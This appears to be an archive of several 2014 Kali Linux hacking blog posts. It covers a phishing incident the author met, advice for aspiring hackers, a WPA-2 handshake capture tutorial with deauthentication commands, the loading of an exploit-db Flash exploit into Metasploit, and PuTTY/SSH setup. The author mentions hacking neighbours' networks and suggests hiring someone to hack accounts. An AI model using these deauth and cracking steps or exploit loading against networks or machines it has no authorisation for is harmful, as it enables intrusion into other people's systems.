Friday, June 20, 2014

Real Life Phishing Scenario : Zero Day google bug

A reader on my blog tried to hack my account

Now all this time I've been teaching people how to hack Wireless networks, Windows machines, Websites and Social Networking accounts. All this we did in Kali Linux. For once, I'm moving away from the operating system and narrating a real life incidence of how someone almost got my Email account and password, and could have possibly infected me with a RAT (remote administration tool). He didn't really mean to hack my account, but was rather interested in making a point. So this is how it happened.



How it started

Everyday, I check my blogger dashboard to see if there are any new comments on my blog. Today morning, I saw an anonymous comment (most of the comments are anonymous so that didn't alarm me) saying that the person needed my help with something but would only contact me via mail. I couldn't give him my personal mail address so I decided to use my website's mail instead, and sent him a message. This was his reply



Looked fair enough. Out of curiosity I clicked the link and it took me to a google drive login page. Everything looked pretty convincing, and I could have easily entered my credentials into the login form, if it were not for the slightly suspicious URL. Also, it was https and chrome verified the digital certificates to be that of google. Faking this can be assumed to be next to be impossible. However, I still was cautious, considering that I run a hacking blog and it's not unlikely that a person visiting here might be good, maybe million times better than me.

What I did

So, I decided, I cannot just dismiss the page as phishing as such without trying. So I entered the email:abcd@gmail.com and password:lookslikephishing and pressed sign in. Now if it were a real page, it would have said incorrect password, but this page had no mechanism for verifying the form data, it actually just kept logging everything (i.e. it recorded whatever someone entered in the form) and would simply download the PDF no matter what we entered in the form. So, after entering the bogus login data, the PDF download started. It completed successfully and I ran the PDF. The content looked genuine and then I realized, well, what if this was a 2 fold attack, first phishing, followed by infection. He could have used a FUD remote administration tool which my antivirus wouldn't be able to detect. I have Windows Defender on my Windows 8 machine, but with proper crypting , anti-viruses can be evaded. So after this, I went to white hat section of hackforums and asked for help (everyone needs help at some time or the other, and I suck at forensics and related stuff) . An expert analyzed my computer thoroughly via teamviewer, and the file was clean indeed. Meanwhile, the following mails had been sent to me.

Mails Recieved


He sent me some mails
He knew I found out the phishing page thing
He said he wants me to spread public awareness regarding this kind of phishing

I replied to him saying that I'm finding out and cleaning the malware he sent me (if any). He replied and said he didn't send any malware or anything.

Finally

 I contacted him via FB. He turned out to be a fellow Indian and was even younger than me (I'm 17 he is 16). By this time I had finished my investigation, and the White hat expert from Hackforums didn't find anything either. I finally concluded that either there is no malware, or he's just too good. Latter is quite unlikely since he was not able to dig up my personal email address on his own. Believe me that's really easy to do. After having a conversation with him and doing some research on this HTTPS phishing page, I realized that it is done using a bug in Google drive, which has been discussed on The Hacker News. I will see if I can replicate a HTTPS phishing website using this bug, and post a tutorial on how to do it. The sole intent of this post is to make people aware that Phishing is a real threat, and to encourage Google to fix this bug soon. Either ways, they will surely patch this bug after I write the tutorial on creating a Phishing page using Google Drive, as Google won't want it's user's accounts to be compromised by any random kid with  a laptop who ended up on this website. Already they have applied a patch which makes carrying this out difficult and during the earlier days of this vulnerability, the URL was short and not suspicious at all, but now it's very long (see the screenshots). Update : Google is probably not going to do anything about the issue as it is not a bug and I'm not gonna take the risk of writing anything which will usher upon me the wrath of Google (as I use blogger for hosting and blogger is owned by google). Google Drive, just like Dropbox allows hosting simple HTML sites like this phishing one. This can be abused, since some people will not know that this is a malicious document uploaded by someone and not a legit Google Drive login page, but it still is not a bug. 
Hacker's message on FB
After I told the hacker on Facebook about this post even he acknowledged that everything about this attack is perfect but the URL which earlier used to start with google drive now has a long suspicious prefix. The vulnerability has been half patched and google will possibly patch the remaining thing soon.

Tuesday, June 17, 2014

So You Want To Be A Hacker

Ah! The world of hackers. It has changed much from the fabled green black terminal operated by guys with spectacles on their eyes and a serious look on their face. Now even a script kiddie who types a few lines on a Kali Linux calls himself a hacker. The terminal is still there, but the colors have changed. It's black terminal with text of all colors. But who cares about the colors. It's the new Operating Systems : The likes of Kali Linux,
Backtrack, BackBox Linux, Node Zero, Blackbuntu, and many more, which have made hacking much easier. However, has it got easy enough? No. Not at all.



It's getting harder

When the going gets tough, the tough get going
While Kali Linux can make hacking Windows XP, wirless networks, and some weak websites very easy, it doesn't mean it is a magical solution to all problems. Everything that can be hacked easily is ancient. No one uses Windows XP anymore, and if they do, the machines are patched because of automatic updates. Very few websites are vulnerable to the standard SQL injection attacks. You'll have to think up and use variants of standard injections to counter the defenses. Yes, WEP networks are easy to hack, and are still abundant, especially in developing countries. But if you want to hack Facebook, then you should step back already, you're going the wrong direction. Facebook isn't paying millions for security so that a kid can Google up the procedure to hack FB and be done with it overnight. But wait, how could I even imagine that you've already reached this point. While all this hacking XP and WEP shit is pretty easy, is it okay to assume you can do it, and are worried about the 'harder' part. Or wait, are you experiencing difficulty in even using Kali Linux. Can't figure out how to install it. Well...

Oh well

First time is always the hardest
In the previous few paragraphs I made a big mistake. I assumed that you have installed Kali Linux and can do some basic stuff with it, and the intermediate level tasks are bothering you. I almost forgot how it was for me. Well let me tell you.


  1. I was 12. Wanted to hack this wireless network next door. 
  2. Download some shitty Windows software. Won't work. Plus had malware installed which had to be removed with antivirus.
  3. More googling, came across BT4. Googled up some tutorials on how to install it. Was too stupid for Vmware. Live? No. Couldn't create a bootable USB. I downloaded the OS and simply copied it to the USB and thought it'll boot. Googled more. Some result said something about boot order. Okay, make USB boot before hard disk. Made some sense, but it wouldn't work. As it is, I was scared as hell when modifying stuff in the scary looking BIOS interface. Hoping I don't do any damage.
  4. Some time later, BT5 was released. Me? A bit smarter this time. Could get BT5 to boot. Read some WEP hacking tutorials. Wasn't able to follow. I even had a tough time with getting the GUI to start. In BT5 we had to type startx for starting X Display server. Didn't know that. Finally, hacked wifi using Aircrack-ng GTK or something (don't remember the name exactly, but it was GUI mode of aircrack, and it was pretty easy for a beginner like me to use it).
  5. Took me an year before I knew how to do stuff without GUI. An year sounds like a long time, but remember, I have much more stuff to do than just hack. I used BT5 once every few months, only when a new network would show up in the neighbourhood, and I would hack it with my laptop. 
  6. Had a great sense of accomplishment inside me. Felt like I was king of this territory, and owned every wireless network here. But then, a WPA-2 network appeared. I tried everything I could, but gave up. I read on hackforums a tutorial on using WPS vulnerability to hack WPA. Well, it looked like it was written in an alien language. Honestly, after knowing how easy hacking WPS enable WPA networks is, I seriously think that the first time indeed is the hardest. 
  7. Fast forward to this moment. I have mastered the basics of linux command line interface, but still have a lot to learn. I can write bash scripts to automate stuff, and can use most of the tools with ease. I am currently studying exploit development and research and can write simple exploits. There's a lot left to learn. I know the depths of wireless pentesting, but only intermediate level of web pentesting. I know the basics of social engineering, but again, lot of things to learn. Now if you are concluding I'm an idiot on the basis of the fact that in every field I just know the basics, well then you need to realize that the meaning of basics in my perspective is much different from that in yours. I need to know a lot of stuff, but I know a lot too.
So what do you conclude from this? Well if you are not able to install Kali, or follow any other tutorial in my website, then don't be surprised. If everyone who visits this website became a hacker, then we'd be having more than 100k hackers created from this website alone, which isn't a good thing at all, considering there are many other websites which receive much more traffic than mine. 

Why so difficult

Hacking is an art
Because that's the way it is. Hacking is an art, and like any other, it takes practice, hard work and determination to master this art. For example, after watching dynamo on TV, I got lured into the idea of becoming a magician. Well, I tried some tricks, but failed miserably. Realized it was not my piece of cake. Some of the tricks require years of practice before they can be pulled off successfully. Not everyone who decides to be a magician ends up becoming one. There are obstacles in the way, disappointments, milestones too hard too achieve. The ones who stay determined all the way to the end only achieve this. It's not everyone's piece of cake. Same goes with hacking. What makes hackers exclusive and special is the fact that not everyone is a hacker. I am known in my class (whole school as well) for being a hacker. Why? Because I'm the only one. Not everyone who sets out to be a hacker becomes one. But there's more to the story than this.


Not that difficult

You are lucky that you ended up on this blog (not a quote as such)
Well, the sites I used to learn hacking were crap. The WEP tutorial was just 3-4 lines of code and no
explanation. I won't be wrong if I say that, while I read a lot of tutorials, none was good enough. For every line in a tutorial, I had to google up another tutorial which explained what it meant. That is, I worked hard and figured everything out on my own. You, however, are lucky. The posts in this blog have been written such that everything is properly explained. In the later tutorials I have been a bit lazy, but it won't be a problem if you follow the tutorials in correct sequence. If you have read 2-3 tutorials on pentesting, you would already know the basics, and the 4th one wouldn't have to be very detailed. If you jump to Win 7 hacking without going through XP, then you'll encounter difficulties. Now I have created a page on this blog where I have ordered the posts in the desirable order of reading. You might also look at the navigation menu on top and read all the tutorials on a top to bottom order basis. And here's the truth finally.

The truth

I want to hack facebook
If you are learning hacking to hack your friends account, then you're never going to become a hacker. Just hire someone to do it. Because the time and effort you'll invest in making an attempt to learn how to do it yourself, and eventually  failing in the same, is much more valuable than the money required to hire someone (no I don't hack FB accounts for money). You might still try social engineering, but it is not a 100% working method, and well, phishing is not hacking, and is illegal. However, if you're motives aren't that selfish, and if you are on a quest for knowledge, then rest assured, you will achieve success. Also , you need to know the art of google-fu. If you face any difficulties, remember, google is a friend (and so am I, I have replied to 100s of comments on this blog personally and always get people through difficulties). The last thing, 50% of the people who come to this blog leave within 1 min of their visit, after seeing just one page. 30% stay for 4-10 mins and read 2 posts. 20% stay for more than 10 minutes, and keep coming back. Only these 20% successfully will become a hacker. Either they succeeded in achieving what they wanted, loved the blog, and came back for more, or they didn't succeed, but came back to try again, and I'm sure they would succeed on a second attempt. Remember, never give up. Less than 20% of the visitors here actually succeed in getting what they want, try and be in that 20%. And if you have any suggestion for this post or for my way of explanation or anything else in general, please comment.

Friday, June 13, 2014

Hack WPA-2 PSK Capturing the Handshake

 WPA password hacking


Okay, so hacking WPA-2 PSK involves 2 main steps-
  1. Getting a handshake (it contains the hash of password, i.e. encrypted password)
  2. Cracking the hash.

Now the first step is conceptually easy. What you need is you, the attacker, a client who'll connect to the wireless network, and the wireless access point. What happens is when the client and access point communicate in order to authenticate the client, they have a 4 way handshake that we can capture. This handshake has the hash of the password. Now there's no direct way of getting the password out of the hash, and thus hashing is a robust protection method. But there is one thing we can do. We can take all possible passwords that can exists, and convert them to hash. Then we'll match the hash we created with the one that's there in the handshake. Now if the hashes match, we know what plain text password gave rise to the hash, thus we know the password. If the process sounds really time consuming to you, then its because it is. WPA hacking (and hash cracking in general) is pretty resource intensive and time taking process. Now there are various different ways cracking of WPA can be done. But since WPA is a long shot, we shall first look at the process of capturing a handshake. We will also see what problems one can face during the process (I'll face the problems for you). Also, before that, some optional wikipedia theory on what a 4-way handshake really is (you don't want to become a script kiddie do you?)

The Four-Way Handshake

The authentication process leaves two considerations: the access point (AP) still needs to authenticate itself to the client station (STA), and keys to encrypt the traffic need to be derived. The earlier EAP exchange or WPA2-PSK has provided the shared secret key PMK (Pairwise Master Key). This key is, however, designed to last the entire session and should be exposed as little as possible. Therefore the four-way handshake is used to establish another key called the PTK (Pairwise Transient Key). The PTK is generated by concatenating the following attributes: PMK, AP nonce (ANonce), STA nonce (SNonce), AP MAC address, and STA MAC address. The product is then put through PBKDF2-SHA1 as the cryptographic hash function.
The handshake also yields the GTK (Group Temporal Key), used to decrypt multicast and broadcast traffic. The actual messages exchanged during the handshake are depicted in the figure and explained below:
  1. The AP sends a nonce-value to the STA (ANonce). The client now has all the attributes to construct the PTK.
  2. The STA sends its own nonce-value (SNonce) to the AP together with a MIC, including authentication, which is really a Message Authentication and Integrity Code: (MAIC).
  3. The AP sends the GTK and a sequence number together with another MIC. This sequence number will be used in the next multicast or broadcast frame, so that the receiving STA can perform basic replay detection.
  4. The STA sends a confirmation to the AP.
All the above messages are sent as EAPOL-Key frames.
As soon as the PTK is obtained it is divided into five separate keys:
PTK (Pairwise Transient Key – 64 bytes)
  1. 16 bytes of EAPOL-Key Confirmation Key (KCK)– Used to compute MIC on WPA EAPOL Key message
  2. 16 bytes of EAPOL-Key Encryption Key (KEK) - AP uses this key to encrypt additional data sent (in the 'Key Data' field) to the client (for example, the RSN IE or the GTK)
  3. 16 bytes of Temporal Key (TK) – Used to encrypt/decrypt Unicast data packets
  4. 8 bytes of Michael MIC Authenticator Tx Key – Used to compute MIC on unicast data packets transmitted by the AP
  5. 8 bytes of Michael MIC Authenticator Rx Key – Used to compute MIC on unicast data packets transmitted by the station
The Michael MIC Authenticator Tx/Rx Keys provided in the handshake are only used if the network is using TKIP to encrypt the data.


 By the way, if you didn't understand much of it then don't worry. There's a reason why people don't  search for hacking tutorials on Wikipedia (half the stuff goes above the head)

Capturing The Handshake

Now there are several (only 2 listed here) ways of capturing the handshake. We'll look at them one by one-
  1. Wifite (easy and automatic)
  2. Airodump-ng (easy but not automatic, you manually have to do what wifite did on its own)

Wifite

Methodology

We'll go with the easy one first. Now you need to realize that for a handshake to be captured, there needs to be a handshake. Now there are 2 options, you could either sit there and wait till a new client shows up and connects to the WPA network, or you can force the already connected clients to disconnect, and when they connect back, you capture their handshake. Now while other tutorials don't mention this, I will (such a good guy I am :) ). Your network card is good at receiving packets, but not as good in creating them. Now if your clients are very far from you, your deauth requests (i.e. please get off this connection request) won't reach them, and you'll keep wondering why you aren't getting any handshake (the same kind of problem is faced during ARP injection and other kind of attacks too). So, the idea is to be as close to the access point (router) and the clients as possible. Now the methodology is same for wifite and airodump-ng method, but  wifite does all this crap for you, and in case of airodump-ng, you'll have to call a brethren (airreply-ng) to your rescue. Okay enough theory.

Get the handshake with wifite

Now my configuration here is quite simple. I have my cellphone creating a wireless network named 'me' protected with wpa-2. Now currently no one is connected to the network. Lets try and see what wifite can do.

root@kali:~# wifite
  .;'                     `;,
 .;'  ,;'             `;,  `;,   WiFite v2 (r85)
.;'  ,;'  ,;'     `;,  `;,  `;,
::   ::   :   ( )   :   ::   ::  automated wireless auditor
':.  ':.  ':. /_\ ,:'  ,:'  ,:'
 ':.  ':.    /___\    ,:'  ,:'   designed for Linux
  ':.       /_____\      ,:'
           /       \        


 [+] scanning for wireless devices...
 [+] enabling monitor mode on wlan0... done
 [+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
 [0:00:04] scanning wireless networks. 0 targets and 0 clients found

 [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  me                     1  WPA2  57db   wps
    2  *******              11  WEP   21db    no   client
    3  **************   11  WEP   21db    no

Now as you can see, my network showed up as 'me'. I pressed ctrl+c and wifite asked me which target to attack (the network has wps enabled. This is an added bonus, reaver can save you from all the trouble. Also, wifite will use reaver too to skip the whole WPA cracking process and use a WPS flaw instead. We have a tutorial on hacking WPA WPS using Reaver already, in this tutorial we'll forget that this network has WPS and capture the handshake instead)
[+] select target numbers (1-3) separated by commas, or 'all':
Now I selected the first target,  i.e. me. As expected, it had two attacks in store for us. First it tried the PIN guessing attack. It has almost 100% success rate, and would have given us the password had I waited for 2-3 hours. But I pressed ctrl+c and it tried to capture the handshake. I waited for 10-20 secs, and then pressd ctrl+c. No client was there so no handshake could be captured. Here's what happened.
[+] 1 target selected.
 [0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:24] WPS attack, 0/0 success/ttl,
 (^C) WPS brute-force attack interrupted
 [0:08:20] starting wpa handshake capture on "me"
 [0:08:05] listening for handshake...                
 (^C) WPA handshake capture interrupted
 [+] 2 attacks completed:
 [+] 0/2 WPA attacks succeeded
 [+] disabling monitor mode on mon0... done
 [+] quitting

Now I connected my other PC to 'me'. Lets do it again. This time a client will show up, and wifite will de-authenticate it, and it'll try to connect again. Lets see what happens this time around.


   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  *    1  WPA   99db    no   client
    2  me  1 WPA2  47db   wps   client
    3  *    11  WEP   22db    no   clients
    4  *   11  WEP   20db    no

 [+] select target numbers (1-4) separated by commas, or 'all': 2
 [+] 1 target selected.
 [0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:07] WPS attack, 0/0 success/ttl,
 (^C) WPS brute-force attack interrupted
 [0:08:20] starting wpa handshake capture on "me"
 [0:07:51] listening for handshake...                
 (^C) WPA handshake capture interrupted
 [+] 2 attacks completed:
 [+] 0/2 WPA attacks succeeded
 [+] quitting


Now the deauth attacks weren't working. This time I increased the deauth frequency.
root@kali:~# wifite -wpadt 1
Soon, however, I realized, that the problem was that I was using my internal card (Kali Live USB). It does not support packet injection, so deauth wasn't working. So time to bring my external card to the scene.

root@kali:~# wifite
  .;'                     `;,
 .;'  ,;'             `;,  `;,   WiFite v2 (r85)
.;'  ,;'  ,;'     `;,  `;,  `;,
::   ::   :   ( )   :   ::   ::  automated wireless auditor
':.  ':.  ':. /_\ ,:'  ,:'  ,:'
 ':.  ':.    /___\    ,:'  ,:'   designed for Linux
  ':.       /_____\      ,:'
           /       \        


 [+] scanning for wireless devices...
 [+] available wireless devices:
  1. wlan1        Ralink RT2870/3070    rt2800usb - [phy1]
  2. wlan0        Atheros     ath9k - [phy0]
 [+] select number of device to put into monitor mode (1-2):


See, we can use the USB card now. This will solve the problems for us.
Now look at wifite output
   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  me                     1  WPA2  44db   wps   client
    2  *                       11  WEP   16db    no   client
    3  *                         11  WEP   16db    no

 [+] select target numbers (1-3) separated by commas, or 'all':
Now I attack the target. This time, finally, I captured a handshake.
 [+] 1 target selected.
 [0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:01] WPS attack, 0/0 success/ttl,
 (^C) WPS brute-force attack interrupted
 [0:08:20] starting wpa handshake capture on "me"
 [0:07:23] listening for handshake...                
 [0:00:57] handshake captured! saved as "hs/me_02-73-8D-**-**-**.cap"
 [+] 2 attacks completed:
 [+] 1/2 WPA attacks succeeded
        me (02:73:8D:37:A7:ED) handshake captured
        saved as hs/me_02-73-8D-**-**-**.cap
   
 [+] starting WPA cracker on 1 handshake
 [!] no WPA dictionary found! use -dict <file> command-line argument
 [+] disabling monitor mode on mon0... done
 [+] quitting
As you can see, it took me 57 seconds to capture the handshake (5 deauth requests were sent, one every 10 secs is defualt). The no dictionary error shouldn't bother you. We'll use Wifite only to capture the handshake. Now the captured handshake was saved as a .cap file which can be cracked using aircrack, pyrit, hashcat (after converting .hccap), etc. using either a wordlist or bruteforce. Let's see how to do the same thing with airodump-ng. This time I won't show you the problems you might run into. It'll be a perfect ride, all the problems were seen in wifite case.



Capturing Handshake with Airodump-ng

Now if you skipped everything and got right here, then you are missing a lot of things. I'll end this pretty quick, as the wifite thing was quite detailed. I'm copying stuff from http://www.kalitutorials.net/2013/08/wifi-hacking-wep.html where I already discussed airodump-ng. (If you are not a newbie, skip to the point where you see red text)

1. Find out the name of your wireless adapter.


Alright, now, your computer has many network adapters, so to scan one, you need to know its name. So there are basically the following things that you need to know-
  • lo - loopback. Not important currently.
  • eth - ethernet
  • wlan - This is what we want. Note the suffix associated.
Now, to see all the adapters, type ifconfig on a terminal. See the result. Note down the wlan(0/1/2) adapter.


Trouble with the wlan interface not showing up. This is because virtual machines can't use internal wireless cards and you will have to use external cards. You should try booting Kali using Live USB (just look at the first part of this tutorial), or buy an external card.

2. Enable Monitor mode

Now, we use a tool called airmon-ng to  create a virtual interface called mon. Just type 
airmon-ng start wlan0
 Your mon0 interface will be created.



3. Start capturing packets

Now, we'll use airodump-ng to capture the packets in the air. This tool gathers data from the wireless packets in the air. You'll see the name of the wifi you want to hack.
airodump-ng mon0

4. Store the captured packets in a file 

This can be achieved by giving some more parameters with the airodump command
airodump-ng mon0 --write name_of_file
Non newbies-
root@kali:~# airmon-ng start wlan1
root@kali:~# airodump-ng mon0 -w anynamehere

 Now copy the bssid field of your target network (from airodump-ng ng screen)and launch a deauth attack with aireplay-ng

 root@kali:~# aireplay-ng --deauth 0 -a BSSID here mon0

The --deauth tells aireplay to launch a deauth attack. 0 tell it to fire it at interval of 0 secs (very fast so run it only for a few secs and press ctrl+c). -a will required BSSID and replace BSSID here with your target BSSID. mon0 is the interface you created.
In case you face problems with the monitor mode hopping from one channel to another, or problem with beacon frame, then fix mon0 on a channel using-
root@kali:~# airodump-ng mon0 -w anynamehere -c 1
Replace 1 with the channel where your target AP is. You might also need to add --ignore-negative-one if aireplay demands it. In my case airodump-ng says fixed channel mon0: -1 so this was required. (It's a bug with aircrack-ng suite).

Now when you look at the airodump-ng screen, you'll see that at the top right it says WPA handshake captured . Here is what it looks like
 CH  1 ][ Elapsed: 24 s ][ 2014-06-13 22:41 ][ WPA handshake: **                                    
                                                                                                                                                
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                
 02:73:8D:37:A7:ED  -47  75      201       35    0   1  54e  WPA2 CCMP   PSK  me                                                                
                                                                                                                                                
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                      
                                                                                                                                                
 *                     *                            0    0e- 1    742       82  me                                                                          
*                       *                           -35  0e- 1      0   26                                                                                   

You can confirm it by typing the following
root@kali:~# aircrack-ng anynamehere-01.cap
Opening anynamehere-01.cap
Read 212 packets.
   #  BSSID              ESSID                     Encryption
   1  **************  me                        WPA (1 handshake)
   2  **                          Unknown



Happy cracking, all that needs to be done in this tutorial has been done. Its been a long one. Hope it helped you.

Monday, June 9, 2014

Add new exploits to Metasploit from Exploit-db

All this time you were just using mainstream exploits which were famous but old. They worked well, but only with old unpatched operating systems, not the updated ones. Now it's time to move on to the next step. Our poor experience against Windows 8 and Java 7u60 left us shattered, and we realized that fully patched and updated machines with strong antivirus and firewall can be pretty  hard to break into. Now we will move into the world of real pentesting, and the first step would be introduction to exploit-db.




(If you don't want the theory and just want to know how to use the exploits, keep scrolling till you see bold text, some of which is in red and/or blue. Just keep using those commands and you'll be done or click here to skip to that part)

Exploit-db

As usual, a few official words from the developers before I express my personal views.

The Exploit Database is the ultimate archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Its aim is to serve as the most comprehensive collection of exploits gathered through direct submissions, mailing lists, and other public sources, and present them in a freely-available and easy-to-navigate database. The Exploit Database is a repository for exploits and proof-of-concepts rather than advisories, making it a valuable resource for those who need actionable data right away. (offensive security)
Some more
The Exploit Database is a CVE-Compatible Database and (where applicable) CVE numbers are assigned to the individual exploit entries in the database. The public database archive does not contain the mapped CVE numbers, but we make them available to our partnering organizations, making links to The Exploit Database entries available within their products.
As many exploit developers lament, it is frequently more difficult to locate a vulnerable application than it is to take a public proof of concept and change it into a working exploit. For this reason, The Exploit Database also hosts the vulnerable application versions whenever possible.
In addition, the team of volunteers that maintain the site also make every effort to verify the submitted exploits and a visual indicator is provided whether or not a successful verification was performed. (Offensive Security)

Now, what exploit db really is, is nothing more than a database where the pentestors who write an exploit for a vulnerability upload the source code of the exploit of other pentestors too see. It is maintained by Offensive Security (the force behind Backtrack, Kali, Metasploit Unleashed). The exploit-db.com site itself is pretty easy to navigate, and you can find all sorts of exploits there. Just finding an exploit, however, is not enough, as you need to add it to Metasploit in order to use it.

Adobe Flash Player Shader Buffer Overflow


This module exploits a buffer overflow vulnerability in Adobe Flash Player. The vulnerability occurs in the flash.Display.Shader class, when setting specially crafted data as its bytecode, as exploited in the wild in April 2014. This module has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13 over Windows XP SP3, Windows 7 SP1 and Windows 8. (rapid7)
Now the site suggest that the exploit can be found here.
exploit/windows/browser/adobe_flash_pixel_bender_bof
But using the command
use exploit/windows/browser/adobe_flash_pixel_bender_bof
shows that the exploit is not in Metasploit yet (chances are good it's there if you update metasploit regularly or if you are reading this tutorial a long time after it was written. Either ways, the method will not differ even if the exploit is already there, so don't worry. Also you can use a different exploit as per your liking, and just replace the name wherever you see it being used in commands)

Now, there are two alternates. First, update the metasploit framework using 

msfupdate
This will update the framework with new modules.

The second alternate the to download the exploit from exploit-db, then put it in the ~/.msf4/modules/exploit/<your_folder> directory. Any exploit put here will be detected my Metasploit when it starts. It will show up when you type use /exploit/your_folder/exploit_name. An important point here is while the <your_folder is arbitrary  and can be set to any value, it is recommended to use a proper directory structure. For example, this exploit should be placed in ~/.msf4/modules/exploit/windows/browser/ directory .Also, it is mandatory to place exploits in a subdirectory of ~/.msf4/modules/exploit/ or you won't be able to use it. For newbies in Linux, here is a detailed step by step guide.

Get the exploit

For examples sake, we'll use the adobe shader exploit from http://www.exploit-db.com/exploits/33333/ Click on the Save icon to download the exploit. Save it on you Kali Desktop.

.msf4 directory method

Now if you are not well versed with linux, you will need help with creating the directory and placing files there. Although I'm guiding you how to do it, you should be proficient in linux usage and should be able to do the basic stuff like this atleast. So, you can either use the command to line create the directories or do it using the GUI.

Command line method

First, say hi to mkdir
mkdir --help
Usage: mkdir [OPTION]... DIRECTORY...
Create the DIRECTORY(ies), if they do not already exist.

Mandatory arguments to long options are mandatory for short options too.
  -m, --mode=MODE   set file mode (as in chmod), not a=rwx - umask
  -p, --parents     no error if existing, make parent directories as needed
  -v, --verbose     print a message for each created directory
  -Z, --context=CTX  set the SELinux security context of each created
                      directory to CTX
      --help     display this help and exit
      --version  output version information and exit

First we'll move to the already existent directory using (you need to be in root directory for this to work. Type just cd if unsure, it will automatically take you to root directory)root@kali:~# cd .msf4/modules/    
To see what the directory has, execute ls. It will return nothing as the directory is empty.
root@kali:~/.msf4/modules# ls
Now we'll use mkdir to create what we need.
root@kali:~/.msf4/modules# mkdir exploits
root@kali:~/.msf4/modules# cd exploits
root@kali:~/.msf4/modules/exploits# mkdir windows        
root@kali:~/.msf4/modules/exploits# cd windows
root@kali:~/.msf4/modules/exploits/windows# mkdir browser
root@kali:~/.msf4/modules/exploits/windows# cp      

If you read the mkdir help thing, you might have noticed the -p option. It makes everything much easier. Everything above can be achieved with something as simple as 
root@kali:~# mkdir -p ~/.msf4/modules/exploits/windows/browser

Now meet cp
root@kali:~/.msf4/modules/exploits/windows# cp --help
Usage: cp [OPTION]... [-T] SOURCE DEST
  or:  cp [OPTION]... SOURCE... DIRECTORY
  or:  cp [OPTION]... -t DIRECTORY SOURCE...
Copy SOURCE to DEST, or multiple SOURCE(s) to DIRECTORY.
Assume you have adobe_flash_pixel_bender_bof.rb file on your desktop. Then use the following commands.
root@kali:~/Desktop# cp adobe_flash_pixel_bender_bof.rb ~/.msf4/modules/exploits/windows

root@kali:~# ls 
Desktop  app.apk
root@kali:~# cd Desktop
root@kali:~/Desktop# cp adobe_flash_pixel_bender_bof.rb ~/.msf4/modules/exploits/windows/browser
Now check for yourself
root@kali:~# cd ~/.msf4/modules/exploits/windows/browser
root@kali:~/.msf4/modules/exploits/windows/browser# ls
adobe_flash_pixel_bender_bof.rb

GUI Method

Go to computer -> Filesystem->Home. Now you won't see .msf4 there, because the . prefix is for hidden files. So go to view and select show hidden items. Now it will be visible.






Now the rest is going to be a piece of cake. Copy the exploit from desktop, and create the directories by using the easy peasy right click -> New folder method. After that just paste the file where it needs to be. You'll be done. Now start msfconsole again or type reload_all to reload the module. This will add the module to metasploit and you can use it as you normally would.



Thursday, June 5, 2014

Remotely Access Kali Terminal Using Putty

In this post we will use PuTTy to remotely or locally access Kali terminal with root priveleges. We will use SSH for this tutorial, though you can use Telnet or any other mode too.

Putty

Some theoretical inforamtion about putty for your digestion.
PuTTY is an SSH and telnet client, developed originally by Simon Tatham for the Windows platform. PuTTY is open source software that is available with source code and is developed and supported by a group of volunteers. (putty.org)

Download

You can download putty here. http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html . That's the official download location. Softpedia, CNET, etc. also provide downloads. You will find a lot of links there, and it will take a minute to find out what you need to download. However, for the sake of ease, the link below this line is likely to be what you are looking for.
A Windows installer for everything except PuTTYtel

Installation is quite easy, nothing you can't handle.

Kali Configuration

There are a few things that need to be done before PuTTy starts working. Firstly, you would be using SSH to connect to Kali (main advantage of SSH is that it's secure, you can search google for more info on SSH). By default, the SSH service isn't started in Kali, but you can still check with
root@kali:~# service --status-all
 [ - ]  ssh
It will display a long list. The - against ssh indicates it is not running. Depending on whether the SSH is installed or not, you can execute the following. Run the second command first, if it works fine the installation isn't required, if not, then execute first command.

root@kali:~#apt-get install openssh-server (to install SSH)
root@kali:~#service ssh start (to start the service)

Optional : If you are connecting remotely and are afraid that someone will eavesdrop your data, then you can use public private key encryption offered by SSH. For this you need to create an RSA key.
root@Kali:~# ssh-keygen -t rsa
You will have to specify where to store the key (just press enter for default location) and then specify a key. This step is quite unnecessary for most users.

Also, type ifconfig to get your eth0 ip address. 

Starting PuTTy on Windows


Start Putty, and you will see a putty configuration dialog. Enter the IP that you found out in the last step. The port will be 22 and connection type SSH. Click open and you'll be prompted to enter the credentials for terminal access. Type in 'root' and your password. You will now see something like this-
You can run commands from here and they will be executed on your Kali machine. There are no functionality restrictions as such, and you can do almost anything from this terminal. Type exit to end the session.

Auto start SSH on Kali Boot

Now every time you will boot into Kali, the SSH service will not be running. You will have to type the following everytime to boot - service ssh start

However, there are alternatives. One straightforward one is to go to Applications -> System Tools -> Preferences -> Startup Application and click on add. Enter the command as service ssh start and add whatever you feel like for Name and Comment (nothing technical there).

Alternatively, you can use update-rc.d to get the same functionality.  It helps add/remove services which will run at booting. Execute the following command to add SSH to startup services
root@kali:~#update-rc.d ssh enable

You can of course write your script to start ssh, but that wouldn't do us much good since starting the service is as easy as one line of code (service ssh start) and you don't write scripts that execute just one command (that is quite an inefficient way of usingputty scripts)